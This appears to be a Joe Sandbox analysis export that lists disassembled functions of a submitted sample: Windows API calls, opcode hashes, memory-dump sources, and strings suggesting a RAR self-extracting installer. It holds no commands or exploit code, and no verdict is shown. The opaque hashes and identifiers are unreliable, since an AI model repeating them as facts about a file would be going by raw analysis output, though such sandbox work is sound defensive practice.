                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                        • String ID:
                        • API String ID: 1324828854-0
                        • Opcode ID: 14cfe3d0bbdbdbe85adbfc033789e1383f0b36b595003ce4bb2da6c841baf0c6
                        • Instruction ID: 6d60be8f47674908b2e0ad8c8f71f77563cf7ce174f104e4005ed8dbd2f9204d
                        • Opcode Fuzzy Hash: 14cfe3d0bbdbdbe85adbfc033789e1383f0b36b595003ce4bb2da6c841baf0c6
                        • Instruction Fuzzy Hash: 1C51B6719002499FDF14CFA8DC95AEEBBF8EF09350F14411AE996E7292E730D941CBA1
                        APIs
                        • __EH_prolog3_GS.LIBCMT ref: 0018533C
                        • ShowWindow.USER32(?,00000000,00000038), ref: 00185364
                        • GetWindowRect.USER32(?,?), ref: 001853A8
                        • ShowWindow.USER32(?,00000005,?,00000000), ref: 00185443
                        • ShowWindow.USER32(00000000,00000005), ref: 00185464
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: Window$Show$H_prolog3_Rect
                        • String ID: RarHtmlClassName
                        • API String ID: 950582801-1658105358
                        • Opcode ID: 25f93fca65963eddec0062587a785c29ba8fe3e1c32363cdd440f6151112e815
                        • Instruction ID: 7bb8942d7d2e0e64a47f8e813ac5b88cfb0ecff7e1dd189acd51bcb6a355ef0b
                        • Opcode Fuzzy Hash: 25f93fca65963eddec0062587a785c29ba8fe3e1c32363cdd440f6151112e815
                        • Instruction Fuzzy Hash: 44412871900204EFDF11AFA4D989AAE7FB9FF48701F148155F908AA156DB70DE81CFA4
                        APIs
                          • Part of subcall function 00199C08: _free.LIBCMT ref: 00199C31
                        • _free.LIBCMT ref: 00199C92
                          • Part of subcall function 00196B34: RtlFreeHeap.NTDLL(00000000,00000000,?,00199C36,?,00000000,?,00000000,?,00199C5D,?,00000007,?,?,0019A05A,?), ref: 00196B4A
                          • Part of subcall function 00196B34: GetLastError.KERNEL32(?,?,00199C36,?,00000000,?,00000000,?,00199C5D,?,00000007,?,?,0019A05A,?,?), ref: 00196B5C
                        • _free.LIBCMT ref: 00199C9D
                        • _free.LIBCMT ref: 00199CA8
                        • _free.LIBCMT ref: 00199CFC
                        • _free.LIBCMT ref: 00199D07
                        • _free.LIBCMT ref: 00199D12
                        • _free.LIBCMT ref: 00199D1D
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: _free$ErrorFreeHeapLast
                        • String ID:
                        • API String ID: 776569668-0
                        • Opcode ID: b35873524a760c03ab9487437f634a877bcf59d48e38088abdb566b69e001564
                        • Instruction ID: 90be6bdd4aa2e5918276285cb82548c90b494fbe9f47d03cb0dd1b02c4f3376b
                        • Opcode Fuzzy Hash: b35873524a760c03ab9487437f634a877bcf59d48e38088abdb566b69e001564
                        • Instruction Fuzzy Hash: A2112171643B04AAEE60B7B4CC47FCB77DC9F25700F408D29B69AF6052EB66B5058690
                        APIs
                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,0018BBE3,0018BB46,0018BDE7), ref: 0018BB7F
                        • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0018BB95
                        • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 0018BBAA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: AddressProc$HandleModule
                        • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                        • API String ID: 667068680-1718035505
                        • Opcode ID: d172309c1afbb9a51d3594969c094f597038d211808b256ba50c3ac4de13ba7a
                        • Instruction ID: 1c7d65edd02cac363710c0d07acca5fdf2adbb95448cfac0c99f8cdaf245d910
                        • Opcode Fuzzy Hash: d172309c1afbb9a51d3594969c094f597038d211808b256ba50c3ac4de13ba7a
                        • Instruction Fuzzy Hash: CAF0CD35749A229B8F316FA46CC697727C8AF023A17190539E802D3944E7A8CE819FD1
                        APIs
                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00192DD9,00192DD9,?,?,?,00197F51,00000001,00000001,54E85006), ref: 00197D5A
                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00197F51,00000001,00000001,54E85006,?,?,?), ref: 00197DE0
                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,54E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00197EDA
                        • __freea.LIBCMT ref: 00197EE7
                          • Part of subcall function 00196B6E: RtlAllocateHeap.NTDLL(00000000,0018C17E,?,?,0018D656,?,?,?,00000000,?,0018C08A,0018C17E,?,?,?,?), ref: 00196BA0
                        • __freea.LIBCMT ref: 00197EF0
                        • __freea.LIBCMT ref: 00197F15
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: ByteCharMultiWide__freea$AllocateHeap
                        • String ID:
                        • API String ID: 1414292761-0
                        • Opcode ID: 30ecd57630c915bbc1b7bec1f863808fb3f3d5fd011e54b0a7ef586ab0d1bbe8
                        • Instruction ID: 9ee7964735a86e1fe926c02ea2dab9a2d7e873bd9b6094eb5ceb4364fe789381
                        • Opcode Fuzzy Hash: 30ecd57630c915bbc1b7bec1f863808fb3f3d5fd011e54b0a7ef586ab0d1bbe8
                        • Instruction Fuzzy Hash: 7451D172A2821AABDF299F64CC41EBF77A9EF54750F154A68FC14D61C0EB34EC40C6A0
                        APIs
                        • FileTimeToSystemTime.KERNEL32(?,?,B19080A7,?,?,?,?,001A09B1,000000FF), ref: 00186413
                        • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?,?,?,001A09B1,000000FF), ref: 00186422
                        • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,001A09B1,000000FF), ref: 00186430
                        • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,001A09B1,000000FF), ref: 0018643E
                        • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032,?,?,?,?,001A09B1,000000FF), ref: 00186459
                        • GetTimeFormatW.KERNEL32(00000400,?,?,00000000,?,00000032,?,?,?,?,001A09B1,000000FF), ref: 00186483
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: Time$System$File$Format$DateLocalSpecific
                        • String ID:
                        • API String ID: 909090443-0
                        • Opcode ID: dfc029a4875d8745494feaf52676cafb24df4c9c11d5510797bf928af33ee990
                        • Instruction ID: 8bb00f6af6a7fcf1f2206dd217b8d12759f36e77713d9861c80611e77a54f572
                        • Opcode Fuzzy Hash: dfc029a4875d8745494feaf52676cafb24df4c9c11d5510797bf928af33ee990
                        • Instruction Fuzzy Hash: 0031D8B2500289ABDB21DFA4DD45EEF77BCFB59710F40412AF90AD7150EB74AA48CB60
                        APIs
                        • GetLastError.KERNEL32(?,?,0018FF61,0018FEEC,0018D444), ref: 0018FF78
                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0018FF86
                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0018FF9F
                        • SetLastError.KERNEL32(00000000,0018FF61,0018FEEC,0018D444), ref: 0018FFF1
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: ErrorLastValue___vcrt_
                        • String ID:
                        • API String ID: 3852720340-0
                        • Opcode ID: a38571ace9eff1b650e2a681478f6977ad3bb4568e8e3d01ad8a07cc07ff9ad1
                        • Instruction ID: e2ae98f4c513315e91e668ded952100ce9b017719113cf8431dd2081ead170e8
                        • Opcode Fuzzy Hash: a38571ace9eff1b650e2a681478f6977ad3bb4568e8e3d01ad8a07cc07ff9ad1
                        • Instruction Fuzzy Hash: CB01D43321D2127EEA1537F46C8596A3A84EF23774330023DF324855F0EF514D829B84
                        APIs
                        • GetLastError.KERNEL32(?,?,00191C52,?,?,?,001916CD,00000050,?), ref: 00196769
                        • _free.LIBCMT ref: 0019679C
                        • _free.LIBCMT ref: 001967C4
                        • SetLastError.KERNEL32(00000000,?), ref: 001967D1
                        • SetLastError.KERNEL32(00000000,?), ref: 001967DD
                        • _abort.LIBCMT ref: 001967E3
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: ErrorLast$_free$_abort
                        • String ID:
                        • API String ID: 3160817290-0
                        • Opcode ID: 32a05b95ebf752dc341ac62fc1d19ed0aa7e57b99aed7a78cbddac97881af0a4
                        • Instruction ID: eac53df828cf49e7078caa91ee27c2b0bfe0e4fc78046a1e1a1151bd0cf0f1ee
                        • Opcode Fuzzy Hash: 32a05b95ebf752dc341ac62fc1d19ed0aa7e57b99aed7a78cbddac97881af0a4
                        • Instruction Fuzzy Hash: 55F0C8362446106BDE1933B8AD86F1F35599FE2779F250114F919D2991FF258C428171
                        APIs
                        • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0018AF0C
                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0018AF26
                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0018AF37
                        • TranslateMessage.USER32(?), ref: 0018AF41
                        • DispatchMessageW.USER32(?), ref: 0018AF4B
                        • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0018AF56
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                        • String ID:
                        • API String ID: 2148572870-0
                        • Opcode ID: 995bebf139e9a8ca9142faae97d6103ae0ec58c72a12c0dd69d93fc1e636fae5
                        • Instruction ID: 4c7a8afad10292e50b8f8329d0172ebbc31d580d25d99bad232586fb956043d5
                        • Opcode Fuzzy Hash: 995bebf139e9a8ca9142faae97d6103ae0ec58c72a12c0dd69d93fc1e636fae5
                        • Instruction Fuzzy Hash: 09F03772A05219ABCF206BA5DC4CDDF7F6DEF523A1B040022F60AD2850D638D985CBE1
                        APIs
                        • GetDlgItem.USER32(?,00000066), ref: 00189609
                        • SendMessageW.USER32(00000000,00000143,00000000,001CAAD0), ref: 00189636
                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00189662
                        • __EH_prolog3_GS.LIBCMT ref: 0018A452
                        Strings
                        • ProgramFilesDir, xrefs: 00189540
                        • Software\Microsoft\Windows\CurrentVersion, xrefs: 00189554
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: MessageSend$H_prolog3_Item
                        • String ID: ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                        • API String ID: 4098331016-2634093826
                        • Opcode ID: 1b04eba76c2e9be5bd3a2a531a8f5f09c6a1707c163ebfe2c5bc8b6347233239
                        • Instruction ID: f9bc4bc8e5d384927adcb01b594dbd0c13bb5191884ffd5fdc4dc63b9745ac9f
                        • Opcode Fuzzy Hash: 1b04eba76c2e9be5bd3a2a531a8f5f09c6a1707c163ebfe2c5bc8b6347233239
                        • Instruction Fuzzy Hash: 8C816131900258EBDF15EBA4CD91FEEB778AF29310F58405AE50AB7181EB705B89CF61
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: _wcslen$H_prolog3
                        • String ID: &nbsp;$<br>
                        • API String ID: 1035939448-26742755
                        • Opcode ID: c648ecc24b3d7e5234a3a110d4312e02bd69588da18ef3fa689a5f0460778a4a
                        • Instruction ID: 21a980068dbda6470d8ff16c973ee34f5a63f6d92985f9a930995786b4758072
                        • Opcode Fuzzy Hash: c648ecc24b3d7e5234a3a110d4312e02bd69588da18ef3fa689a5f0460778a4a
                        • Instruction Fuzzy Hash: 0A414134B003129BDB28AF54C991A3D7332FBA5704F60842EE4159F681EFB59A92CFD1
                        APIs
                        • LoadBitmapW.USER32(00000065), ref: 00187755
                        • GetObjectW.GDI32(00000000,00000018,?), ref: 0018777A
                        • DeleteObject.GDI32(00000000), ref: 001877AC
                        • DeleteObject.GDI32(00000000), ref: 001877CF
                          • Part of subcall function 00185C5C: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,001877A5,00000066), ref: 00185C6F
                          • Part of subcall function 00185C5C: SizeofResource.KERNEL32(00000000,?,?,?,001877A5,00000066), ref: 00185C86
                          • Part of subcall function 00185C5C: LoadResource.KERNEL32(00000000,?,?,?,001877A5,00000066), ref: 00185C9D
                          • Part of subcall function 00185C5C: LockResource.KERNEL32(00000000,?,?,?,001877A5,00000066), ref: 00185CAC
                          • Part of subcall function 00185C5C: GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,?,001877A5,00000066), ref: 00185CC7
                          • Part of subcall function 00185C5C: GlobalLock.KERNEL32(00000000,?,?,?,?,?,001877A5,00000066), ref: 00185CD8
                          • Part of subcall function 00185C5C: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00185D41
                          • Part of subcall function 00185C5C: GlobalUnlock.KERNEL32(00000000), ref: 00185D60
                          • Part of subcall function 00185C5C: GlobalFree.KERNEL32(00000000), ref: 00185D67
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: GlobalResource$Object$BitmapDeleteLoadLock$AllocCreateFindFreeFromGdipSizeofUnlock
                        • String ID: ]
                        • API String ID: 1428510222-3352871620
                        • Opcode ID: b86a77f11955cce90f8765528fe7d7e701c1c7c89e8c65fbbf22ef7481eab861
                        • Instruction ID: c4d779305da31df41d541c14af579783d85d6be692886d9fff2134394ed5ad2a
                        • Opcode Fuzzy Hash: b86a77f11955cce90f8765528fe7d7e701c1c7c89e8c65fbbf22ef7481eab861
                        • Instruction Fuzzy Hash: 8701D236540A01A7D7127BA48C09E7F7A7BEFA0B56F250014F904A72D0DB71CE158FE1
                        APIs
                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,001953F8,001963DC,?,00195398,001963DC,001AC1F0,0000000C,001954EF,001963DC,00000002), ref: 00195467
                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0019547A
                        • FreeLibrary.KERNEL32(00000000,?,?,?,001953F8,001963DC,?,00195398,001963DC,001AC1F0,0000000C,001954EF,001963DC,00000002,00000000), ref: 0019549D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: AddressFreeHandleLibraryModuleProc
                        • String ID: CorExitProcess$mscoree.dll
                        • API String ID: 4061214504-1276376045
                        • Opcode ID: 20526ec005ec2dbce5d44661757a6875aa6f446c9f5403645db772928654b3e2
                        • Instruction ID: 4dd50a4bdd46d73e189b350df630e0fcf70f5afa3a18973dfadf7094a64b1b3b
                        • Opcode Fuzzy Hash: 20526ec005ec2dbce5d44661757a6875aa6f446c9f5403645db772928654b3e2
                        • Instruction Fuzzy Hash: BDF04F31A0160CBBDF129B95DC09BAEBFB5EF45752F004065F805A6561EB704AC0CB90
                        APIs
                          • Part of subcall function 0017A473: __EH_prolog3_GS.LIBCMT ref: 0017A47A
                          • Part of subcall function 0017A473: GetSystemDirectoryW.KERNEL32(00000000,00000104), ref: 0017A4AF
                        • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00178C28
                        • GetProcAddress.KERNEL32(001BA138,CryptUnprotectMemory), ref: 00178C38
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: AddressProc$DirectoryH_prolog3_System
                        • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                        • API String ID: 270589589-1753850145
                        • Opcode ID: 82925ff9010a6578b99e62b9e746e3575e0ff29c061a4d1c99947c754f095639
                        • Instruction ID: 1f79dad34752c068b0a96abc1ca19472a554291d1a87d8d1bdf57601278ea78a
                        • Opcode Fuzzy Hash: 82925ff9010a6578b99e62b9e746e3575e0ff29c061a4d1c99947c754f095639
                        • Instruction Fuzzy Hash: 4DE01A748457525ECB265B6C9908A827EE45B16710B14C81DF4CAD2551DBB5D4C08B60
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: AdjustPointer$_abort
                        • String ID:
                        • API String ID: 2252061734-0
                        • Opcode ID: 569c7c911c86bdaaa11e1012ff5d30cae11d59d15b3015031e8af6757617a9c7
                        • Instruction ID: 06fe991374c15e5663883646986295247291deebf10cca0dcf6d4bbb59434dca
                        • Opcode Fuzzy Hash: 569c7c911c86bdaaa11e1012ff5d30cae11d59d15b3015031e8af6757617a9c7
                        • Instruction Fuzzy Hash: DA51AE72600306AFEF2A9F54D841BBA77A5EF58710F18452DEC05872A2E731EE80CB91
                        APIs
                        • __EH_prolog3_GS.LIBCMT ref: 00174869
                        • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?), ref: 001748F4
                        • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?), ref: 0017494B
                        • SetFileTime.KERNEL32(?,00000000,00000000,00000000), ref: 00174A0D
                        • CloseHandle.KERNEL32(?), ref: 00174A14
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: File$Create$CloseH_prolog3_HandleTime
                        • String ID:
                        • API String ID: 4002707884-0
                        • Opcode ID: e8074da6bb77c62b2846ed317a8f983f0db16fee6cedcabc19d536076f0099f0
                        • Instruction ID: ed110a4b2aa4816f2e87fc8c6cf0243609c7befafed357ec61efe6cbca38b9ea
                        • Opcode Fuzzy Hash: e8074da6bb77c62b2846ed317a8f983f0db16fee6cedcabc19d536076f0099f0
                        • Instruction Fuzzy Hash: DB519B30E00249ABEF25DFE8C845BEEBBB5AF49314F248119F555F7280D7349A44CB69
                        APIs
                        • GetEnvironmentStringsW.KERNEL32 ref: 001992D9
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 001992FC
                          • Part of subcall function 00196B6E: RtlAllocateHeap.NTDLL(00000000,0018C17E,?,?,0018D656,?,?,?,00000000,?,0018C08A,0018C17E,?,?,?,?), ref: 00196BA0
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00199322
                        • _free.LIBCMT ref: 00199335
                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00199344
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
